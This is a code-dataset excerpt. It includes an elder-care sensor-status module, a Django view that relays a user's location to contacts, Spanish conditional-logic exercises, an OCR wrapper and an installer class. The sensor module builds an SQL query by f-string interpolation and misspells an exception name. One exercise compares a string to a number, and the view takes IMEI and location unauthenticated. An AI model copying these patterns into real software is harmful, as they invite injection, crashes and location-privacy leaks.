\"door\" else False\n isMotion = True if type == \"motion\" else False\n isBed = True if type == \"bed sensor\" else False\n\n #LEGACY -- \"disconnected\" only exists in master students' data set. As this was thrown by gateway\n last_sysmons = sysmon_log_DAO.get_last_sysmon(uuid)\n if len(last_sysmons) > 0:\n if last_sysmons[0].key == \"disconnected\": ret_codes.append(cls.DISCONNECTED)\n\n if isDoor: # DOOR SENSOR\n return cls.get_curr_status_door(uuid=uuid, retBatteryLevel=retBatteryLevel)\n\n elif isMotion: # MOTION SENSOR\n return cls.get_curr_status_motion(uuid=uuid, retBatteryLevel=retBatteryLevel)\n\n elif isBed: # BED SENSOR (JUVO)\n return cls.get_curr_status_juvo(target=sensor.juvo_target)\n\n else:\n ret_codes.append(cls.INVALID_SENSOR)\n return ret_codes\n\n\n @classmethod\n def get_all_sensor_status_v2(cls, retBatteryLevel=False):\n '''\n Returns 'up' | 'down' status of ALL sensors.\n\n Inputs:\n retBatteryLevel -- True, return battery level if exists. Default false\n\n Return:\n list of sensors, status codes, and optionally battery levels:\n NOTE: Battery level can be 'None' if no records are found\n\n [ [Sensor.Entity, [Status, Codes, battLVL]],\n [Sensor.Entity, [Status, Codes, None]]...\n ]\n\n See list of status codes\n '''\n # Ret list in form: [[uuid, [status codes], [uuid, [status codes]]]]\n sensor_status = []\n\n # List of all Sensors\n sensors = sensor_DAO.get_sensors()\n\n # Iterate all sensors and get statuss\n for sensor in sensors:\n uuid = sensor.uuid\n status = cls.get_sensor_status_v2(uuid=uuid, retBatteryLevel=retBatteryLevel)\n if retBatteryLevel: sensor_status.append([uuid, status[0], status[1]])\n else: sensor_status.append([uuid, status])\n\n return sensor_status\n\n\n @classmethod\n def get_down_periods_motion(cls, uuid, start_dt, end_dt):\n '''\n Checks if readings during `start_dt` to `end_dt` can be trusted. i.e.\n If we can confirm sensor is ON during the period\n\n INPUTS\n uuid (str)\n start_dt (datetime)\n end_dt (datetime)\n\n RETURNS:\n list of periods where sensor CANNOT be trusted: [(start_dt, end_dt), ...]\n if empty, period can be trusted\n '''\n # Expand period by 2 hours, 1 before start_dt and 1 hour after end_dt\n # This is to gather the sysmon battery updates\n start_dt_buff = start_dt - timedelta(hours=cls.motion_thresh)\n end_dt_buff = end_dt + timedelta(hours=cls.motion_thresh)\n\n # get all sysmon battery readings within start_dt and end_dt\n records = sysmon_log_DAO.get_logs(uuid=uuid, key=Sysmon_Log.key_battery, start_dt=start_dt_buff, end_dt=end_dt_buff, descDT=False, limit=0)\n # CHECK 1: If no records found, sensor is confirmed down during the period, but just\n if records == None: return [(start_dt, end_dt)]\n if len(records) == 0: return [(start_dt, end_dt)]\n\n # CHECK 2: sysmon battery updates >> hourly sysmon battery updates are ASSURED\n down_periods = []\n\n # >> Corner case, when period given is current. and only 1 batt sysmon can be found before\n # >> Return true if diff has been less than 1 hour. Assume still up\n if len(records) == 1:\n curr_ts = records[0][Sysmon_Log.recieved_timestamp_tname]\n if curr_ts < start_dt and (start_dt-curr_ts) < timedelta(hours=cls.motion_thresh): return []\n\n prev_ts = None\n for i in range(0, len(records)): # Greedy\n\n # Initial assignment\n curr_ts = records[i][Sysmon_Log.recieved_timestamp_tname]\n if prev_ts == None:\n prev_ts = curr_ts\n continue\n\n # Nothing wrong >> update was within 1 hour + buffer\n if (curr_ts - prev_ts) / timedelta(minutes=1) <= (60 * cls.motion_thresh):\n prev_ts = curr_ts\n continue\n\n # Something wrong >> update was > 1 hour + buffer. There is a missing battery update\n pred_missing = prev_ts + timedelta(hours=1)\n\n # >> Assumption here is that there will never be a period where sensor revives and sends a reading without a sysmon battery update\n # >> Therefore if sensor is brought back up, it sends a sysmon battery update soon after\n enc_logs = Sensor_mgmt.get_enclosing_logs(start_dt=prev_ts, end_dt=curr_ts, target_dt=pred_missing)\n # ^ last before and first atfer reading (sensor and sysmon) from where the next missing battery update is\n\n if len(enc_logs) == 0: down_periods.append([prev_ts, curr_ts])\n if len(enc_logs) == 2: down_periods.append([enc_logs[0], enc_logs[1]])\n if len(enc_logs) == 1:\n if enc_logs[0] < pred_missing: down_periods.append([enc_logs[0], curr_ts])\n if enc_logs[0] > pred_missing: down_periods.append([prev_ts, enc_logs[0]])\n\n # shift down 1\n prev_ts = curr_ts\n\n return down_periods\n\n\n @classmethod\n def get_curr_status_motion(cls, uuid, retBatteryLevel=False):\n '''\n Returns list of status codes. See class vars\n\n Inputs:\n uuid (str)\n '''\n # Get down periods\n now = datetime.datetime.now()\n down_periods = cls.get_down_periods_motion(uuid=uuid, start_dt=now, end_dt=now)\n ret_codes = []\n down = False\n for p in down_periods: # Check if current time is within a down period\n # print(p)\n if p[0] <= now and now <= p[1]:\n down = True\n break\n ret_codes.append(cls.CHECK_WARN if down else cls.OK)\n\n # Battery level?\n if retBatteryLevel == False: return ret_codes\n else:\n batt_lvl = []\n last_batt = sysmon_log_DAO.get_last_battery_level(uuid=uuid)\n if last_batt != None: # Sysmon batt event found\n batt_lvl.append(last_batt.event)\n if last_batt.event < cls.batt_thresh:\n ret_codes.append(cls.LOW_BATT)\n return ret_codes, batt_lvl\n\n\n @classmethod\n def get_enclosing_logs(cls, start_dt, end_dt, target_dt):\n '''\n Given a target datetime, returns...\n Last record (sysmon or sensor reading) before the target and first record after the target\n\n Inputs:\n start_dt (datetime)\n end_dt (datetime)\n target_dt (datetime)\n\n Returns:\n [before_dt, after_dt]\n NOTE: dts can be None, meaning no records during that period\n '''\n enc_sensor = sensor_log_DAO.get_enclosing_logs(start_dt=start_dt, end_dt=end_dt, target_dt=target_dt) # Sensor readings: 1st before target, 1st after target\n enc_sysmon = sysmon_log_DAO.get_enclosing_logs(start_dt=start_dt, end_dt=end_dt, target_dt=target_dt) # Sysmon readings: 1st before target, 1st after target\n\n enc_logs = [None, None]\n if enc_sensor[0] == None and enc_sysmon[0] != None: enc_logs[0] = enc_sysmon[0]\n elif enc_sensor[0] != None and enc_sysmon[0] == None: enc_logs[0] = enc_sensor[0]\n elif enc_sensor[0] < enc_sysmon[0]: enc_logs[0] = enc_sysmon[0]\n else: enc_logs[0] = enc_sensor[0]\n\n if enc_sensor[1] == None and enc_sysmon[1] != None: enc_logs[1] = enc_sysmon[1]\n elif enc_sensor[1] != None and enc_sysmon[1] == None: enc_logs[1] = enc_sensor[1]\n elif enc_sensor[1] < enc_sysmon[1]: enc_logs[1] = enc_sensor[1]\n else: enc_logs[1] = enc_sysmon[1]\n\n return enc_logs\n\n\n @classmethod\n def get_down_periods_Juvo(cls, target, start_dt, end_dt):\n '''\n Returns the down period for Juvo Bed sensors\n Logic is based on the Environment readings, which should be read in continous 5 minute windows\n\n Inputs:\n target (int)\n start_dt (datetime)\n end_dt (datetime)\n\n Returns:\n list -- [[start,end], ...]\n '''\n readings = JuvoAPI.get_target_environ_stats(target=target, start_time=start_dt, end_time=end_dt)\n\n # No readings, therefore all down\n if readings == None: return [[start_dt, end_dt]]\n\n logs = readings['data']['stats']\n logs.sort(key=lambda x: parser.parse(x['local_start_time'])) # Sorted in increasing time order\n\n down_periods = []\n prev_sdt = None\n prev_edt = None\n for log in logs:\n curr_sdt = parser.parse(log['local_start_time']).replace(tzinfo=None)\n curr_edt = parser.parse(log['local_end_time']).replace(tzinfo=None)\n\n # Inital assignment\n if prev_sdt==None and prev_edt==None:\n prev_sdt = curr_sdt\n prev_edt = curr_edt\n continue\n\n # Periods not continuous\n if (curr_sdt - prev_edt) > timedelta(minutes=10):\n down_periods.append([prev_edt, curr_sdt])\n\n prev_sdt = curr_sdt\n prev_edt = curr_edt\n\n # Deal with last log - curr time\n # Find the previous 5 divisible minute (when environ stats should have sent data)\n edt = datetime.datetime.now()\n edt = edt.replace(minute=(math.floor(edt.minute / 5) * 5), second=0, microsecond=0)\n cutoff = edt - timedelta(minutes=cls.juvo_thresh) # lag between data reading and availablity on API\n if cutoff - prev_edt > timedelta(minutes=cls.juvo_thresh): # Difference > Lag thresh. Therefore is down not lagged\n down_periods.append([prev_edt, cutoff])\n\n return down_periods\n\n\n @classmethod\n def get_curr_status_juvo(cls, target):\n '''\n Returns status of Juvo Bed sensor based on last received environment statistic\n if last received was > threshold mins, then return down.\n\n target (int)\n '''\n # Get all environ readings for past 1 hour\n end_dt = datetime.datetime.now() # Also the current time\n start_dt = end_dt - timedelta(hours=1)\n readings = JuvoAPI.get_target_environ_stats(target=target, start_time=start_dt, end_time=end_dt)\n\n ret_codes = []\n if readings == None: ret_codes.append(cls.CHECK_WARN) # No readings, therefore down\n elif len(readings['data']['stats']) == 0: ret_codes.append(cls.CHECK_WARN)\n else:\n # Compare last reading with current time, against threshold\n logs = readings['data']['stats']\n if(len(logs) > 0):\n logs.sort(key=lambda x: parser.parse(x['local_start_time'])) # Sorted in increasing time order\n last_log = logs[-1]\n last_log_edt = parser.parse(last_log['local_end_time']).replace(tzinfo=None)\n\n time_since_update = end_dt - last_log_edt\n if time_since_update > timedelta(minutes=cls.juvo_thresh): ret_codes.append(cls.CHECK_WARN)\n else: ret_codes.append(cls.OK)\n else:\n ret_codes.append(cls.CHECK_WARN)\n\n return ret_codes, []\n\n @classmethod\n def get_down_periods_door(cls, uuid, start_dt, end_dt):\n '''\n Returns the down periods for the door sensor\n NOTE: down/up can only be assigned to a daily/24 hour basis, hard to get more accurate than that\n\n Inputs:\n uuid (str)\n start_dt (datetime) -- Inclusive\n end_dt (datetime) -- Inclusive\n\n Return\n List of down time: [[start,end]...]\n '''\n\n # Split into periods whereby the 10th would refer to 12pm 9th, to 12pm 10th\n start_date = start_dt.replace(hour=0, minute=0, second=0) - timedelta(days=1) # Expand by 1 day, in case start and end are the same day\n end_date = end_dt.replace(hour=0, minute=0, second=0)\n\n # Get all sensor logs of this uuid between start and end dates\n logs = sensor_log_DAO.get_logs(uuid=uuid, start_datetime=start_date, end_datetime=end_date)\n logs.sort(key = lambda x: x.recieved_timestamp) # ASC\n\n # Treat bathroom and main door differently\n location = sensor_DAO.get_sensors(uuid=uuid)[0].location\n if location == \"toilet\":\n if logs == None or len(logs) == 0: # No readings since, send warning\n return [[start_date.replace(hour=0, minute=0), end_date.replace(hour=23, minute=59)]]\n else: return []\n\n # if no records, consider down\n if len(logs) == 0:\n missing_dates = [start_date]\n else:\n # Find dates without logs\n logs_d_only = [l.recieved_timestamp.replace(hour=0, minute=0, microsecond=0) for l in logs]\n min_log_dt = logs_d_only[0]\n max_log_dt = logs_d_only[-1]\n full_cal = set(min_log_dt + timedelta(x) for x in range((max_log_dt - min_log_dt).days)) # All dates between start and end\n missing_dates = sorted(full_cal - set(logs_d_only))\n\n # Slice out dates with no owner\n ownership = sensor_DAO.get_ownership_hist(uuid=uuid, start_dt=start_dt, end_dt=end_dt)\n min_dt = max_dt = datetime.datetime.now()\n for p in ownership[uuid]:\n if p[1] != None and (p[1] < min_dt): min_dt = p[1].replace(hour=0, minute=0, microsecond=0)\n if p[2] != None and (p[2] > max_dt): max_dt = p[2].replace(hour=0, minute=0, microsecond=0)\n\n ownerless = []\n if min_dt > start_dt: ownerless += [start_dt + timedelta(x) for x in range((min_dt - start_dt).days)]\n if max_dt < end_dt: ownerless += [max_dt + timedelta(x) for x in range((end_dt - max_dt).days)]\n missing_dates = sorted(set(missing_dates) - set(ownerless))\n\n # Fine tune periods without logs, it may just be the case where no one uses the door at all\n # Assumption: reisdents sleep with doors closed. Therefore use Juvo to fine-tune\n down_periods = []\n for missing in missing_dates:\n missing_end = missing.replace(hour=12)\n missing_start = missing_end - timedelta(days=1)\n\n # Get owner by period\n door_ownership = sensor_DAO.get_ownership_hist(uuid=uuid, start_dt=missing_start, end_dt=missing_end)\n rid_owners = [v[0][0] for k,v in door_ownership.items()]\n\n # Get Juvo owner by period ERROR HERE MAKE NEW QUERY\n juvo_ownership = sensor_DAO.get_ownership_hist(start_dt=missing_start, end_dt=missing_end, type=\"bed sensor\")\n juvo_uuid = None\n for k,v in juvo_ownership.items():\n if v[0][0] in rid_owners:\n juvo_uuid = k\n break\n\n if juvo_uuid == None: # This resident didnt own a bed sensor this day\n down_periods.append([missing.replace(hour=0, minute=0), missing.replace(hour=23, minute=59)])\n\n if juvo_uuid != None: # Attempt to find if owner slept this period\n target = None\n for s in sensor_DAO.get_sensors(uuid=juvo_uuid):\n target = s.juvo_target\n break\n\n if target == None: # This resident didnt own a bed sensor this day\n down_periods.append([missing.replace(hour=0, minute=0), missing.replace(hour=23, minute=59)])\n\n # Check if sleep was detected\n juvo_offset_dt = missing - timedelta(days=1) # i.e. Sleep for 10th = 10th 12pm to 11th 12pm\n records = JuvoAPI.get_target_sleep_summaries(target, juvo_offset_dt, juvo_offset_dt)['sleep_summaries']\n for r in records:\n total_sleep = r['light'] + r['deep'] + r['awake']\n if total_sleep < 0: # Sleep detected, no door detected. assume door is down\n down_periods.append([missing.replace(hour=0, minute=0), missing.replace(hour=23, minute=59)])\n return down_periods\n\n\n @classmethod\n def get_curr_status_door(cls, uuid, retBatteryLevel=False):\n '''\n Returns list of status codes. See class vars\n\n Inputs:\n uuid (str)\n '''\n # Get down periods\n now = datetime.datetime.now()\n down_periods = cls.get_down_periods_door(uuid=uuid, start_dt=now, end_dt=now)\n\n ret_codes = []\n down = False\n for p in down_periods: # Check if current time is within a down period\n # print(p)\n if p[0] <= now and now <= p[1]:\n down = True\n break\n ret_codes.append(cls.CHECK_WARN if down else cls.OK)\n\n # Battery level?\n if retBatteryLevel == False: return ret_codes\n else:\n batt_lvl = []\n last_batt = sysmon_log_DAO.get_last_battery_level(uuid=uuid)\n if last_batt != None: # Sysmon batt event found\n batt_lvl.append(last_batt.event)\n if last_batt.event < cls.batt_thresh:\n ret_codes.append(cls.LOW_BATT)\n return ret_codes, batt_lvl\n\n\n Juvo_SLEEP = 1 # Someone was sleeping\n JUVO_NOONE = 0 # No one slept\n JUVO_DOWN = -1 # There is no way to know if anyone slept or not, so just scrumb the entire preiod as down\n @classmethod\n def check_sleep_noone_down_juvo(cls, target, date):\n '''\n Utility method to investigate the reason for a missing date (i.e. no sleep_summary readings from sensor)\n NOTE: Will return weird results if given a date that has readings\n\n Inputs:\n target (int)\n date (datetime) -- Sleep period for 12th considers 12th noon - 13th noon\n\n Returns:\n JUVO_NOONE = 0 -- Probably no one slept that night\n JUVO_DOWN = 1 -- Sensor is down during that date\n '''\n\n # Juvo looks at night after, but we want to look at the night before\n prev_date = date - timedelta(days=1) # 12 am of 1 day before date\n end_dt = date.replace(hour=12) # 12 noon of date\n start_dt = end_dt - timedelta(days=1) # 12 noon of 1 day before date\n\n sleep_summaries = JuvoAPI.get_target_sleep_summaries(target=target, start_date=prev_date, end_date=prev_date)\n down_periods = cls.get_down_periods_Juvo(target=target, start_dt=start_dt, end_dt=end_dt)\n\n if sleep_summaries != None: return cls.Juvo_SLEEP # C1: If sleep summaries found, then JUVO_SLEEP\n elif len(down_periods) == 0: return cls.JUVO_NOONE # C2: If no sleep summaries found, AND 0 down periods, then JUVO_NOONE\n else: return cls.JUVO_DOWN # C3: If no sleep summaries found, AND any down period: JUVO DOWN\n\n @classmethod\n def get_toilet_uuid(cls, resident_id):\n '''\n WARNING: ghetto method for mid terms quick fix\n returns the active uuid (str) for the current input resident_id (int)\n '''\n factory = connection_manager()\n connection = factory.connection\n cursor = connection.cursor()\n output = None\n query = f\"SELECT uuid FROM stbern.sensor_ownership_hist WHERE resident_id = {resident_id} AND period_end IS NULL AND uuid LIKE '%m-02'\"\n try:\n cursor.execute(query)\n result = cursor.fetchone()\n\n if result:\n output = result['uuid']\n except Exceptio as e:\n print(e)\n\n return output\n\n# TESTS ======================================================================================\nif __name__ == '__main__':\n\n # # Room 1\n # print(\"================ ROOM 1 ================\")\n # uuid = \"2005-m-01\"\n # print(f\"Testing UUID: {uuid}, Status: {Sensor_mgmt.get_sensor_status(uuid)}\")\n\n # uuid = \"2005-m-02\"\n # print(f\"Testing UUID: {uuid}, Status: {Sensor_mgmt.get_sensor_status(uuid)}\")\n\n # uuid = \"2005-d-01\"\n # print(f\"Testing UUID: {uuid}, Status: {Sensor_mgmt.get_sensor_status(uuid)}\")\n\n # uuid = \"2005-d-02\"\n # print(f\"Testing UUID: {uuid}, Status: {Sensor_mgmt.get_sensor_status(uuid)}\")\n\n # uuid = \"2005-j-01\"\n # print(f\"Testing UUID: {uuid}, Status: {Sensor_mgmt.get_sensor_status(uuid)}\")\n\n # # Room 2\n # print(\"================ ROOM 1 ================\")\n # uuid = \"2006-m-01\"\n # print(f\"Testing UUID: {uuid}, Status: {Sensor_mgmt.get_sensor_status(uuid)}\")\n\n # uuid = \"2006-m-02\"\n # print(f\"Testing UUID: {uuid}, Status: {Sensor_mgmt.get_sensor_status(uuid)}\")\n\n # uuid = \"2006-d-01\"\n # print(f\"Testing UUID: {uuid}, Status: {Sensor_mgmt.get_sensor_status(uuid)}\")\n\n # uuid = \"2006-d-02\"\n # print(f\"Testing UUID: {uuid}, Status: {Sensor_mgmt.get_sensor_status(uuid)}\")\n\n # uuid = \"2006-j-01\"\n # print(f\"Testing UUID: {uuid}, Status: {Sensor_mgmt.get_sensor_status(uuid)}\")\n\n # # Room 3\n # print(\"================ ROOM 3 ================\")\n # uuid = \"2100-room 3-m-01\"\n # print(f\"Testing UUID: {uuid}, Status: {Sensor_mgmt.get_sensor_status(uuid)}\")\n\n # uuid = \"2100-room 3-m-02\"\n # print(f\"Testing UUID: {uuid}, Status: {Sensor_mgmt.get_sensor_status(uuid)}\")\n\n # uuid = \"2100-room 3-d-01\"\n # print(f\"Testing UUID: {uuid}, Status: {Sensor_mgmt.get_sensor_status(uuid)}\")\n\n # uuid = \"2100-room 3-j-01\"\n # print(f\"Testing UUID: {uuid}, Status: {Sensor_mgmt.get_sensor_status(uuid)}\")\n\n # # Room 4\n # print(\"================ ROOM 4 ================\")\n # uuid = \"2100-room 4-m-01\"\n # print(f\"Testing UUID: {uuid}, Status: {Sensor_mgmt.get_sensor_status(uuid)}\")\n\n # uuid = \"2100-room 4-m-02\"\n # print(f\"Testing UUID: {uuid}, Status: {Sensor_mgmt.get_sensor_status(uuid)}\")\n\n # uuid = \"2100-room 4-d-01\"\n # print(f\"Testing UUID: {uuid}, Status: {Sensor_mgmt.get_sensor_status(uuid)}\")\n\n # # ADAM\n # print(\"================ ADAM ROAD ================\")\n # uuid = \"2100-room 4-m-01\"\n # print(f\"Testing UUID: {uuid}, Status: {Sensor_mgmt.get_sensor_status(uuid)}\")\n\n # All\n # print(\"=============== ALL SENSORS ==============\")\n # for ss in Sensor_mgmt.get_all_sensor_status(retBatteryLevel=True):\n # print(ss)\n\n # for ss in Sensor_mgmt.get_all_sensor_status(retBatteryLevel=False):\n # print(ss)\n\n # ================== UP / DOWN ==================\n uuid = \"2005-m-02\"\n target = 460\n sdt = datetime.datetime(year=2018, month=3, day=2)\n edt = datetime.datetime(year=2018, month=10, day=5)\n\n # # MOTION =======================================\n # print(\"MOTION ===================================\")\n # print(\"===== Down Periods =====\")\n # down_periods = Sensor_mgmt.get_down_periods_motion(uuid=uuid, start_dt=sdt, end_dt=edt)\n # for p in down_periods: print(p)\n # print(f\"Curr status: \", Sensor_mgmt.get_curr_status_motion(uuid=uuid, retBatteryLevel=True))\n\n # JUVO =============================================\n # sdt = datetime.datetime(year=2018, month=9, day=19, hour=12) # Target installation pains\n # edt = datetime.datetime(year=2018, month=9, day=19, hour=16) # Target installation pains\n # sdt = datetime.datetime(year=2018, month=3, day=2) # MIN\n # edt = datetime.datetime(year=2018, month=10, day=5) # MAX\n # print(\"JUVO ===================================\")\n # print(\"===== Down Periods =====\")\n # down_periods = Sensor_mgmt.get_down_periods_Juvo(target, sdt, edt)\n # for p in down_periods: print(p)\n # print(f\"Curr status: \", Sensor_mgmt.get_curr_status_juvo(target=target))\n\n\n # DOOR =============================================\n # uuid = \"2006-d-01\"\n # print(\"DOOR ===================================\")\n # print(\"===== Down Periods =====\")\n # down_periods = Sensor_mgmt.get_down_periods_door(uuid, sdt, edt)\n # for p in down_periods: print(p)\n # print(\"periods done\")\n # print(f\"Curr status: \", Sensor_mgmt.get_curr_status_door(uuid=target, retBatteryLevel=True))\n\n # ALL ==============================================\n print(\"ALL =====================================\")\n start = time.clock()\n for status in Sensor_mgmt.get_all_sensor_status_v2(retBatteryLevel=True):\n print(status)\n print(\"time taken: \", time.clock() - start)\n","sub_path":"web/sensor_mgmt/sensor_mgmt.py","file_name":"sensor_mgmt.py","file_ext":"py","file_size_in_byte":32421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"74564044","text":"import datetime\n\nfrom django.http import JsonResponse\n\nfrom apps.bot.APIs.YandexGeoAPI import YandexGeoAPI\nfrom apps.bot.classes.bots.CommonBot import get_bot_by_platform\nfrom apps.bot.classes.common.CommonMethods import localize_datetime\nfrom apps.bot.models import Users\nfrom apps.db_logger.models import MovementLog\n\n\ndef json_response(params):\n return JsonResponse(params, json_dumps_params={'ensure_ascii': False})\n\n\ndef get_somewhere(lat, lon):\n yandexgeo_api = YandexGeoAPI()\n address = yandexgeo_api.get_address(lat, lon)\n\n if address is not None:\n msg = f\"Я нахожусь примерно тут:\\n\" \\\n f\"{address}\\n\"\n else:\n msg = \"\"\n msg += f\"Позиция на карте:\\n\" \\\n f\"https://yandex.ru/maps/?ll={lon}%2C{lat}&mode=search&text={lat}%2C%20{lon}&z=16\\n\"\n return msg\n\n\ndef get_another_position(author, where):\n positions = {\n \"home\": {0: \"Выхожу из дома\", 1: \"Я дома\", \"count\": 0},\n \"work\": {0: \"Я на работе\", 1: \"Выхожу с работы\", \"count\": 0},\n \"university\": {0: \"Я в универе\", 1: \"Выхожу из универа\", \"count\": 0},\n }\n\n today = localize_datetime(datetime.datetime.utcnow(), author.city.timezone.name)\n today_logs = MovementLog.objects.filter(date__year=today.year, date__month=today.month, date__day=today.day,\n author=author)\n for today_log in today_logs:\n if today_log.event in positions:\n positions[today_log.event]['count'] += 1\n msg = positions[where][positions[where]['count'] % 2]\n return msg\n\n\ndef where_is_me(request):\n log = MovementLog()\n\n where = request.GET.get('where', None)\n if not where:\n log.msg = \"Where is None\"\n log.save()\n return json_response({'status': 'error', 'message': log.msg})\n log.event = where\n\n imei = request.GET.get('imei', None)\n if not imei:\n log.msg = \"IMEI is None\"\n log.save()\n return json_response({'status': 'error', 'message': log.msg})\n log.imei = imei\n\n author = Users.objects.filter(imei=imei).first()\n if not author:\n log.msg = \"Author is None\"\n log.save()\n return json_response({'status': 'error', 'message': log.msg})\n log.author = author\n\n recipients = author.send_notify_to.all()\n if not recipients:\n log.msg = \"Recipients is None\"\n log.save()\n return json_response({'status': 'error', 'message': log.msg})\n\n if where == 'somewhere':\n lat = request.GET.get('lat', None)\n lon = request.GET.get('lon', None)\n if not lat or not lon:\n log.msg = \"Lat or Lon is None\"\n log.save()\n return json_response({'status': 'error', 'message': log.msg})\n msg = get_somewhere(lat, lon)\n elif where in ['home', 'work', 'university']:\n msg = get_another_position(author, where)\n else:\n log.msg = \"Не найдено такое событие(?)\"\n log.save()\n return json_response({'status': 'error', 'message': log.msg})\n\n msg += \"\\n%s\" % author.name\n log.msg = msg\n log.save()\n for recipient in recipients:\n bot = get_bot_by_platform(recipient.get_platform_enum())()\n bot.parse_and_send_msgs(recipient.user_id, msg)\n log.success = True\n return json_response({'status': 'success'})\n","sub_path":"apps/bot/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"252479221","text":"def estCondicional01():\n #Definir variables y otros\n print(\"Ejemplo estructura Condicional en Python\")\n montoP=0\n #Datos de entrada\n cantidadX=int(input(\"Ingrese la cantidad de lapices:\"))\n #Proceso\n if cantidadX>=1000:\n montoP=cantidadX*0.80\n else:\n montoP=cantidadX*0.90 \n #Datos de salida\n print(\"El monto a pagar es:\", montoP)\ndef estCondicional02():\n #Definir variables y otros\n print(\"Ejemplo estructura Condicional en Python 02\")\n montoP=0\n #Datos de entrada\n cantidadX=int(input(\"Ingrese la cantidad de personas:\"))\n #Proceso\n if cantidadX<=200:\n montoP=cantidadX*95\n elif cantidadX>200 and cantidadX<=300:\n montoP=cantidadX*85\n else:\n montoP=cantidadX*75\n #Datos de salida\n print(\"El monto a pagar es:\", montoP)\ndef bonoDocente():\n #definir Variables\n bonoObtenido=0.0\n #Datos de Endrada\n salarioMinimo=float(input(\"Ingrese el salario minimo:\"))\n puntuacionObtenida=float(input(\"Ingrese la puntuación que ha obtenido:\"))\n #Proceso\n if puntuacionObtenida<=100 and puntuacionObtenida>=0:\n bonoObtenido=salarioMinimo\n elif puntuacionObtenida >=101 and puntuacionObtenida<=150:\n bonoObtenido=salarioMinimo*2\n elif puntuacionObtenida>150:\n bonoObtenido=salarioMinimo*3 \n #Datos de salida\n print(\"El docente obtendra un bono de:\", bonoObtenido )\n\n\ndef paquetesJDQC():\n #Definir Variables\n resultPaqueteDmp=\"\"\n #Datos de entrada\n montoRvDiDmpc=float(input(\"Ingrese el monto que recibe en diciembre:\"))\n #Proceso\n if montoRvDiDmpc>=50000:\n resultPaqueteDmp=\"Paquete A\"\n elif montoRvDiDmpc>=20000 and resultPaqueteDmp<50000:\n resultPaqueteDmp=\"Paquete B\"\n elif montoRvDiDmpc>=10000 and montoRvDiDmpc<20000:\n resultPaqueteDmp=\"Paquete C\"\n else:\n resultPaqueteDmp=\"Paquete D\"\n #Datos de salida\n print(\"La persona comprara el: \", resultPaqueteDmp)\n\ndef paquetes():\n #Definir Variables\n resultPaquete=\"\"\n #Datos de entrada\n montoRvDic=float(input(\"Ingrese el monto que recibe en diciembre:\"))\n #Proceso\n if montoRvDic>=50000:\n resultPaquete=\"Paquete A\"\n elif montoRvDic>=20000 and montoRvDic<50000:\n resultPaquete=\"Paquete B\"\n elif montoRvDic>=10000 and montoRvDic<20000:\n resultPaquete=\"Paquete C\"\n else:\n resultPaquete=\"Paquete D\"\n #Datos de salida\n print(\"La persona comprara el: \", resultPaquete)\n\n\n#estCondicional02()\n#estCondicional01()\n#bonoDocente()\n\npaquetesJDQC()\n\n\n#estCondicional01()\n","sub_path":"est-condicional/EstCondicional.py","file_name":"EstCondicional.py","file_ext":"py","file_size_in_byte":2397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"332290726","text":"import subprocess\n\n\nclass Tesseract:\n def __init__(self, language=\"deu\", executable=\"/usr/bin/tesseract\"):\n self.language = language\n self.executable = executable\n\n def extract_text(self, input_file):\n return self._extract(input_file, False)\n\n def _extract(self, input_file, hocr):\n # --psm 1 = Automatic page segmentation with OSD. (Orientation and script detection)\n cmd = [\n self.executable,\n input_file,\n \"stdout\",\n \"-l\",\n self.language,\n \"--psm\", \"1\"\n ]\n\n if hocr:\n cmd.append(\"hocr\")\n\n result = subprocess.run(cmd, stdout=subprocess.PIPE, stderr=None)\n\n return result.stdout.decode()\n\n","sub_path":"scanstotext/Tesseract.py","file_name":"Tesseract.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"260550393","text":"#\nimport os\nimport ShareYourSystem\nfrom ShareYourSystem.Functions import Tool\nfrom ShareYourSystem.Classors import Classor,Representer\nfrom ShareYourSystem.Functers import Argumenter\nfrom ShareYourSystem.Object import Readmer\nimport importlib\nBaseModule=importlib.import_module(\"ShareYourSystem.Object.Directer\")\nDecorationModule=importlib.import_module(\"ShareYourSystem.Classors.Classer\")\n#\n\n#\nBaseNameString=Classor.getNameStringWithModuleString(BaseModule.__name__)\nBaseClass=getattr(\n\t\t\t\t\t\tBaseModule,\n\t\t\t\t\t\tClassor.getClassStringWithNameString(BaseNameString)\n\t\t\t\t\t\t)\nDecorationNameString=Classor.getNameStringWithModuleString(DecorationModule.__name__)\nDecorationClass=getattr(\n\t\t\t\t\t\t\tDecorationModule,\n\t\t\t\t\t\t\tClassor.getClassStringWithNameString(DecorationNameString)\n\t\t\t\t\t\t\t)\n#\n\n#\n@DecorationClass()\nclass InstallerClass(BaseClass):\n\t\n\t#@Hooker.HookerClass(**{'HookingAfterVariablesList':[{'CallingVariable':BaseClass.init}]})\n\tdef __init__(self,\n\t\t\t\t\t\t_InstallingPathString=\"\",\n\t\t\t\t\t\t_InstalledReadmerPointer=None,\n\t\t\t\t\t\t**_KwargVariablesDict\n\t\t\t\t\t):\n\n\t\t#Call the parent __init__ method\n\t\tBaseClass.__init__(self,**_KwargVariablesDict)\n\n\t@Argumenter.ArgumenterClass()\n\tdef install(self,_PathString=None,**_KwargVariablesDict):\n\n\t\t#Check\n\t\tif self.InstallingPathString==\"\":\n\t\t\tself.InstallingPathString=os.getcwd().split('ShareYourSystem')[0]+'ShareYourSystem/'\n\n\t\t#Debug\n\t\t'''\n\t\tself.debug(('self.',self,['InstallingPathString']))\n\t\t'''\n\n\t\t#Check\n\t\tif self.InstalledReadmerPointer==None:\n\t\t\tself.InstalledReadmerPointer=Readmer.ReadmerClass()\n\n\t\t#direct the document command\n\t\tself.direct(\n\t\t\t\t\t\tlambda _LiargVariablesList,_FolderPathString,_FileKeyStringsList:\n\t\t\t\t\t\tself.InstalledReadmerPointer.readme(\n\t\t\t\t\t\t\t**{\n\t\t\t\t\t\t\t\t'DocumentingNameString':_FolderPathString.split('/')[-2],\n\t\t\t\t\t\t\t\t'FolderingPathString':_FolderPathString\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t) if '__init__.py' in _FileKeyStringsList else None,\n\t\t\t\t\t\t[],\n\t\t\t\t\t\t**{'FolderingPathString':self.InstallingPathString}\n\t\t\t\t\t)\n\n\t\t#Return self\n\t\treturn 